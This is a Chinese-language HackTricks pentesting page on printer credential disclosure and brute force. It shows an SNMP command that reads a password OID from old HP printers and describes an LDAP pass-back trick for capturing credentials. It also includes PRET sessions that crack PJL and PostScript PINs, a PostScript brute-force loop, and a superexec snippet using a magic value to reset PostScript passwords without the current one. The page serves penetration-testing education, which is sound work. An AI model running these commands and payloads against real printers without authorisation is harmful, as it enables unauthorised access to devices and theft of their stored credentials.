hacktricks/network-services-pentesting/pentesting-printers/credentials-disclosure-brute-force.md
2023-08-03 19:12:22 +00:00

6.4 KiB
Raw Blame History

凭证泄露 / 暴力破解

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

打印机通常使用默认密码或根本没有初始密码进行部署。在这两种情况下,最终用户或管理员必须主动设置密码以保护设备。

密码泄露

SNMP

古老的HP打印机存在一个返回密码的易受攻击的OID。其他供应商可能也存在类似基于SNMP的问题。

snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …

Pass-Back

如果打印机使用外部LDAP对人员进行授权。如果您可以访问更改此设置可能使用Web控制台界面您可以使打印机连接到您的LDAP服务器并授权任何用户。请注意您还可以滥用此设置来窃取打印机用于连接到LDAP服务器的凭据。在此处阅读更多信息

Brute-Force

PJL

由于其仅有16位密钥大小PJL密码容易受到暴力破解攻击的影响。在不到30分钟的时间内您可以猜测出正确的密码。

您可以使用PRETlockunlock命令来测试暴力破解:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection:  ENABLED
Panel lock:      ON
Disk lock:       ON
printer:/> unlock
No PIN given, cracking.
PIN protection:  DISABLED
Panel lock:      OFF
Disk lock:       OFF

PostScript

PostScript提供两种类型的密码SystemParamsPassword用于更改打印作业设置,如纸张大小,而StartJobPassword则需要退出服务器循环从而永久更改PostScript环境。

针对PostScript密码的暴力攻击可以非常快速地执行因为PostScript解释器可以被编程为直接破解自身

/min 0 def /max 1000000 def
statusdict begin {
min 1 max
{dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop

另一种方法是通过使用Adobe的专有superexec运算符来绕过PostScript密码并将其重置。该运算符位于internaldict字典中该字典由一个静态的、魔术密码1183615869进行“保护”。将PostScript代码包装到superexec中允许攻击者忽略语言的各种保护机制这通常会引发invalidaccess错误。可以使用以下示例设置PostScript密码而无需首先提交当前密码

{ << /SystemParamsPassword (0)
/StartJobPassword (0) >> setsystemparams
} 1183615869 internaldict /superexec get exec

PRET的锁定和解锁命令可用于对数字整数PostScript密码进行暴力破解攻击的测试,或者通过superexec magic绕过这些密码:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Device unlocked with password: 999
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
printer:/> unlock bypass
Resetting password to zero with super-secret PostScript magic
Device unlocked with password: 0

有关密码泄露和暴力破解的更多信息,请访问 http://hacking-printers.net/wiki/index.php/Credential_disclosure

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥